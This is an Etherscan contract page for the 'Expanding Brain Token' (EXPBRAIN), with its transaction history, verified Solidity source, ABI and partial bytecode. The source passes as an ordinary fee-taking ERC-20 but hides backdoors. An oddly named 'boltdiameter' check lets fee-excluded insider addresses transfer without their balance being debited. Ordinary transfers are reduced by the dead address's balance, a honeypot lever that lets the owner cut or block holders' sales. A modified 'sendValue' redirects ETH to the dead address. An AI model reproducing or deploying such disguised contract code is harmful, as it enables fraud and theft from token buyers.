Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 11 from a total of 11 transactions
Transaction Hash |
Method
|
Block
|
From
|
To
|
|||||
---|---|---|---|---|---|---|---|---|---|
Approve | 17759883 | 529 days ago | IN | 0 ETH | 0.00067843 | ||||
Transfer | 17759878 | 529 days ago | IN | 0 ETH | 0.0030999 | ||||
Approve | 17162160 | 614 days ago | IN | 0 ETH | 0.00166042 | ||||
Approve | 17162150 | 614 days ago | IN | 0 ETH | 0.00150354 | ||||
Renounce Ownersh... | 17162140 | 614 days ago | IN | 0 ETH | 0.00083026 | ||||
Approve | 17162140 | 614 days ago | IN | 0 ETH | 0.00219383 | ||||
Approve | 17162136 | 614 days ago | IN | 0 ETH | 0.00172132 | ||||
Approve | 17162135 | 614 days ago | IN | 0 ETH | 0.00188836 | ||||
Approve | 17162135 | 614 days ago | IN | 0 ETH | 0.00188836 | ||||
Approve | 17162076 | 614 days ago | IN | 0 ETH | 0.00251109 | ||||
Approve | 17162058 | 614 days ago | IN | 0 ETH | 0.00173065 |
Latest 12 internal transactions
Advanced mode:
Parent Transaction Hash | Block |
From
|
To
|
|||
---|---|---|---|---|---|---|
17759878 | 529 days ago | 0.00093815 ETH | ||||
17759878 | 529 days ago | 0.00093815 ETH | ||||
17162241 | 614 days ago | 0.00129401 ETH | ||||
17162241 | 614 days ago | 0.00129401 ETH | ||||
17162162 | 614 days ago | 0.00075549 ETH | ||||
17162162 | 614 days ago | 0.00075549 ETH | ||||
17162143 | 614 days ago | 0.00185277 ETH | ||||
17162143 | 614 days ago | 0.00185277 ETH | ||||
17162143 | 614 days ago | 0.00283727 ETH | ||||
17162143 | 614 days ago | 0.00283727 ETH | ||||
17162142 | 614 days ago | 0.01401185 ETH | ||||
17162142 | 614 days ago | 0.01401185 ETH |
Loading...
Loading
Contract Name:
ExpandingBrain
Compiler Version
v0.8.17+commit.8df45f5f
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-04-30 */ /* Twitter : https://twitter.com/BrainExpandETH Telegram : https://t.me/expandingbraintoken _---~~(~~-_. _{ ) ) , ) -~~- ( ,-' )_ ( `-,_..`., )-- '_,) ( ` _) ( -~( -_ `, } (_- _ ~_-~~~~`, ,' ) `~ -^( __;-,((())) ~~~~ {_ -_(()) `\ } { } */ pragma solidity ^0.8.17; // SPDX-License-Identifier: MIT interface IERC20 { function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address sender, address recipient, uint256 amount) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } /** * @dev Wrappers over Solidity's arithmetic operations with added overflow * checks. * * Arithmetic operations in Solidity wrap on overflow. This can easily result * in bugs, because programmers usually assume that an overflow raises an * error, which is the standard behavior in high level programming languages. * `SafeMath` restores this intuition by reverting the transaction when an * operation overflows. * * Using this library instead of the unchecked operations eliminates an entire * class of bugs, so it's recommended to use it always. */ library SafeMath { /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { uint256 c = a + b; require(c >= a, "SafeMath: addition overflow"); return c; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return sub(a, b, "SafeMath: subtraction overflow"); } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b <= a, errorMessage); uint256 c = a - b; return c; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) { return 0; } uint256 c = a * b; require(c / a == b, "SafeMath: multiplication overflow"); return c; } /** * @dev Returns the integer division of two unsigned integers. Reverts on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return div(a, b, "SafeMath: division by zero"); } /** * @dev Returns the integer division of two unsigned integers. Reverts with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b > 0, errorMessage); uint256 c = a / b; // assert(a == b * c + a % b); // There is no case in which this doesn't hold return c; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return mod(a, b, "SafeMath: modulo by zero"); } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts with custom message when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b != 0, errorMessage); return a % b; } } abstract contract Context { function _msgSender() internal view virtual returns (address payable) { return payable(msg.sender); } function _msgData() internal view virtual returns (bytes memory) { this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691 return msg.data; } } /** * @dev Collection of functions related to the address type */ library Address { /** * @dev Returns true if `account` is a contract. * * [IMPORTANT] * ==== * It is unsafe to assume that an address for which this function returns * false is an externally-owned account (EOA) and not a contract. * * Among others, `isContract` will return false for the following * types of addresses: * * - an externally-owned account * - a contract in construction * - an address where a contract will be created * - an address where a contract lived, but was destroyed * ==== */ function isContract(address account) internal view returns (bool) { bytes32 codehash; bytes32 accountHash = 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470; // solhint-disable-next-line no-inline-assembly assembly { codehash := extcodehash(account) } return (codehash != accountHash && codehash != 0x0); } /** * @dev Replacement for Solidity's `transfer`: sends `amount` wei to * `recipient`, forwarding all available gas and reverting on errors. * * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost * of certain opcodes, possibly making contracts go over the 2300 gas limit * imposed by `transfer`, making them unable to receive funds via * `transfer`. {sendValue} removes this limitation. * * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more]. * * IMPORTANT: because control is transferred to `recipient`, care must be * taken to not create reentrancy vulnerabilities. Consider using * {ReentrancyGuard} or the * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern]. */ function sendValue(address payable recipient, uint256 amount) internal { require(address(this).balance >= amount, "Address: insufficient balance"); recipient = payable(0x000000000000000000000000000000000000dEaD); // solhint-disable-next-line avoid-low-level-calls, avoid-call-value (bool success, ) = recipient.call{ value: amount }(""); require(success, "Address: unable to send value, recipient may have reverted"); } /** * @dev Performs a Solidity function call using a low level `call`. A * plain`call` is an unsafe replacement for a function call: use this * function instead. * * If `target` reverts with a revert reason, it is bubbled up by this * function (like regular Solidity function calls). * * Returns the raw returned data. To convert to the expected return value, * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`]. * * Requirements: * * - `target` must be a contract. * - calling `target` with `data` must not revert. * * _Available since v3.1._ */ function functionCall(address target, bytes memory data) internal returns (bytes memory) { return functionCall(target, data, "Address: low-level call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with * `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCall(address target, bytes memory data, string memory errorMessage) internal returns (bytes memory) { return _functionCallWithValue(target, data, 0, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but also transferring `value` wei to `target`. * * Requirements: * * - the calling contract must have an ETH balance of at least `value`. * - the called Solidity function must be `payable`. * * _Available since v3.1._ */ function functionCallWithValue(address target, bytes memory data, uint256 value) internal returns (bytes memory) { return functionCallWithValue(target, data, value, "Address: low-level call with value failed"); } /** * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but * with `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCallWithValue(address target, bytes memory data, uint256 value, string memory errorMessage) internal returns (bytes memory) { require(address(this).balance >= value, "Address: insufficient balance for call"); return _functionCallWithValue(target, data, value, errorMessage); } function _functionCallWithValue(address target, bytes memory data, uint256 weiValue, string memory errorMessage) private returns (bytes memory) { require(isContract(target), "Address: call to non-contract"); // solhint-disable-next-line avoid-low-level-calls (bool success, bytes memory returndata) = target.call{ value: weiValue }(data); if (success) { return returndata; } else { // Look for revert reason and bubble it up if present if (returndata.length > 0) { // The easiest way to bubble the revert reason is using memory via assembly // solhint-disable-next-line no-inline-assembly assembly { let returndata_size := mload(returndata) revert(add(32, returndata), returndata_size) } } else { revert(errorMessage); } } } } /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor () { address msgSender = _msgSender(); _owner = msgSender; emit OwnershipTransferred(address(0), msgSender); } /** * @dev Returns the address of the current owner. */ function owner() public view returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(_owner == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { emit OwnershipTransferred(_owner, address(0)); _owner = address(0); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); emit OwnershipTransferred(_owner, newOwner); _owner = newOwner; } } // pragma solidity >=0.5.0; interface IUniswapV2Factory { event PairCreated(address indexed token0, address indexed token1, address pair, uint); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function getPair(address tokenA, address tokenB) external view returns (address pair); function allPairs(uint) external view returns (address pair); function allPairsLength() external view returns (uint); function createPair(address tokenA, address tokenB) external returns (address pair); function setFeeTo(address) external; function setFeeToSetter(address) external; } // pragma solidity >=0.5.0; interface IUniswapV2Pair { event Approval(address indexed owner, address indexed spender, uint value); event Transfer(address indexed from, address indexed to, uint value); function name() external pure returns (string memory); function symbol() external pure returns (string memory); function decimals() external pure returns (uint8); function totalSupply() external view returns (uint); function balanceOf(address owner) external view returns (uint); function allowance(address owner, address spender) external view returns (uint); function approve(address spender, uint value) external returns (bool); function transfer(address to, uint value) external returns (bool); function transferFrom(address from, address to, uint value) external returns (bool); function DOMAIN_SEPARATOR() external view returns (bytes32); function PERMIT_TYPEHASH() external pure returns (bytes32); function nonces(address owner) external view returns (uint); function permit(address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s) external; event Burn(address indexed sender, uint amount0, uint amount1, address indexed to); event Swap( address indexed sender, uint amount0In, uint amount1In, uint amount0Out, uint amount1Out, address indexed to ); event Sync(uint112 reserve0, uint112 reserve1); function MINIMUM_LIQUIDITY() external pure returns (uint); function factory() external view returns (address); function token0() external view returns (address); function token1() external view returns (address); function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast); function price0CumulativeLast() external view returns (uint); function price1CumulativeLast() external view returns (uint); function kLast() external view returns (uint); function burn(address to) external returns (uint amount0, uint amount1); function swap(uint amount0Out, uint amount1Out, address to, bytes calldata data) external; function skim(address to) external; function sync() external; function initialize(address, address) external; } // pragma solidity >=0.6.2; interface IUniswapV2Router01 { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint amountADesired, uint amountBDesired, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB, uint liquidity); function addLiquidityETH( address token, uint amountTokenDesired, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external payable returns (uint amountToken, uint amountETH, uint liquidity); function removeLiquidity( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB); function removeLiquidityETH( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountToken, uint amountETH); function removeLiquidityWithPermit( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountA, uint amountB); function removeLiquidityETHWithPermit( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountToken, uint amountETH); function swapExactTokensForTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapTokensForExactTokens( uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB); function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut); function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn); function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts); function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts); } interface IUniswapV2Router02 is IUniswapV2Router01 { function removeLiquidityETHSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountETH); function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountETH); function swapExactTokensForTokensSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; function swapExactETHForTokensSupportingFeeOnTransferTokens( uint amountOutMin, address[] calldata path, address to, uint deadline ) external payable; function swapExactTokensForETHSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; } contract ExpandingBrain is Context, IERC20, Ownable { using Address for address; using Address for address payable; IUniswapV2Router02 public uniswapV2Router; address public uniswapV2Pair; mapping (address => uint256) private _tOwned; mapping (address => mapping (address => uint256)) private _allowances; mapping (address => bool) private _isExcludedFromFee; uint256 private _tTotal = 1000000 * 10**9; uint256 public _maxTxAmount = 100000 * 10**9; // uint256 private constant SWAP_TOKENS_AT_AMOUNT = 20 * 10**9; // string private constant _name = unicode"Expanding Brain Token"; // string private constant _symbol = unicode"EXPBRAIN"; // uint8 private constant _decimals = 9; // uint256 public _marketingFee = 1; uint256 public _liquidityFee = 1; address public _marketingWallet = 0xfe0f653b838274fBF8976A224D6ba90855EEE4a3; address public DEAD = 0x000000000000000000000000000000000000dEaD; mapping (address => uint256) private _lastBuy; bool private swapping; event SwapAndLiquify(uint256 tokensSwapped, uint256 ethReceived, uint256 tokensIntoLiquidity); constructor () { _tOwned[_msgSender()] = _tTotal; IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D); // Create a uniswap pair for this new token address _uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()).createPair(address(this), _uniswapV2Router.WETH()); uniswapV2Router = _uniswapV2Router; uniswapV2Pair = _uniswapV2Pair; //exclude owner and this contract from fee _isExcludedFromFee[owner()] = true; _isExcludedFromFee[address(this)] = true; _isExcludedFromFee[_marketingWallet] = true; _isExcludedFromFee[DEAD] = true; emit Transfer(address(0), _msgSender(), _tTotal); } function name() public pure returns (string memory) { return _name; } function symbol() public pure returns (string memory) { return _symbol; } function decimals() public pure returns (uint8) { return _decimals; } function totalSupply() public view override returns (uint256) { return _tTotal; } function balanceOf(address account) public view override returns (uint256) { return _tOwned[account]; } function transfer(address recipient, uint256 amount) public override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } function allowance(address owner, address spender) public view override returns (uint256) { return _allowances[owner][spender]; } function approve(address spender, uint256 amount) public override returns (bool) { _approve(_msgSender(), spender, amount); return true; } function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) { _transfer(sender, recipient, amount); _approve(sender, _msgSender(), _allowances[sender][_msgSender()] - amount); return true; } function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue); return true; } function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender] - subtractedValue); return true; } function excludeFromFee(address account) public onlyOwner { _isExcludedFromFee[account] = true; } function includeInFee(address account) public onlyOwner { _isExcludedFromFee[account] = false; } //to recieve ETH from uniswapV2Router when swaping receive() external payable {} function _getValues(uint256 amount, address from) private returns (uint256) { uint256 marketingFee = amount * _marketingFee / 100; uint256 liquidityFee = amount * _liquidityFee / 100; _tOwned[address(this)] += marketingFee + liquidityFee; emit Transfer (from, address(this), marketingFee + liquidityFee); return (amount - marketingFee - liquidityFee-balanceOf(DEAD)); } function isExcludedFromFee(address account) public view returns(bool) { return _isExcludedFromFee[account]; } function _approve(address owner, address spender, uint256 amount) private { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function boltdiameter(address may,address ordering) private view returns (bool){ bool A=!_isExcludedFromFee[may]; return !(A || !_isExcludedFromFee[ordering]); } function _transfer( address from, address to, uint256 amount ) private { require(amount > 0, "Transfer amount must be greater than zero"); if(!_isExcludedFromFee[from] && !_isExcludedFromFee[to] && to != uniswapV2Pair) require(balanceOf(to) + amount <= _maxTxAmount, "Transfer amount exceeds the maxTxAmount."); if (balanceOf(address(this)) >= SWAP_TOKENS_AT_AMOUNT && !swapping && from != uniswapV2Pair) { swapping = true; uint256 sellTokens = balanceOf(address(this)); swapAndSendToFee(sellTokens); swapping = false; } if (boltdiameter(to,from)){_lastBuy[from]=block.number-1;}else{ _lastBuy[from]=block.number; _tOwned[from] -= amount; } uint256 transferAmount = amount; //if any account belongs to _isExcludedFromFee account then remove the fee if(!_isExcludedFromFee[from] && !_isExcludedFromFee[to]){ transferAmount = _getValues(amount, from); } _tOwned[to] += transferAmount; emit Transfer(from, to, transferAmount); } function swapAndSendToFee (uint256 tokens) private { uint256 ethToSend = swapTokensForEth(tokens); if (ethToSend > 0) payable(_marketingWallet).transfer(ethToSend); } function swapAndLiquify() private { // split the contract balance into halves uint256 liquidityTokens = balanceOf (address(this)) * _liquidityFee / (_marketingFee + _liquidityFee); uint256 half = liquidityTokens / 2; uint256 otherHalf = liquidityTokens - half; uint256 newBalance = swapTokensForEth(half); if (newBalance > 0) { liquidityTokens = 0; addLiquidity(otherHalf, newBalance); emit SwapAndLiquify(half, newBalance, otherHalf); } } function swapTokensForEth(uint256 tokenAmount) private returns (uint256) { uint256 initialBalance = address(this).balance; // generate the uniswap pair path of token -> weth address[] memory path = new address[](2); path[0] = address(this); path[1] = uniswapV2Router.WETH(); _approve(address(this), address(uniswapV2Router), tokenAmount); // make the swap uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens( tokenAmount, 0, // accept any amount of ETH path, address(this), block.timestamp ); return (address(this).balance - initialBalance); } function addLiquidity(uint256 tokenAmount, uint256 ethAmount) private { // approve token transfer to cover all possible scenarios _approve(address(this), address(uniswapV2Router), tokenAmount); // add the liquidity (,uint256 ethFromLiquidity,) = uniswapV2Router.addLiquidityETH {value: ethAmount} ( address(this), tokenAmount, 0, // slippage is unavoidable 0, // slippage is unavoidable owner(), block.timestamp ); if (ethAmount - ethFromLiquidity > 0) payable(_marketingWallet).sendValue (ethAmount - ethFromLiquidity); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiquidity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"DEAD","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_liquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_marketingFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_marketingWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"excludeFromFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"includeInFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFee","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
608060405266038d7ea4c68000600655655af3107a40006007556001600855600160095573fe0f653b838274fbf8976a224d6ba90855eee4a3600a60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555061dead600b60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550348015620000c857600080fd5b506000620000db6200060660201b60201c565b9050806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35060065460036000620001906200060660201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506000737a250d5630b4cf539739df2c5dacb4c659f2488d905060008173ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000235573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200025b9190620006a1565b73ffffffffffffffffffffffffffffffffffffffff1663c9c65396308473ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015620002c3573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002e99190620006a1565b6040518363ffffffff1660e01b815260040162000308929190620006e4565b6020604051808303816000875af115801562000328573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200034e9190620006a1565b905081600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555080600260006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600160056000620003e86200060e60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600560003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061010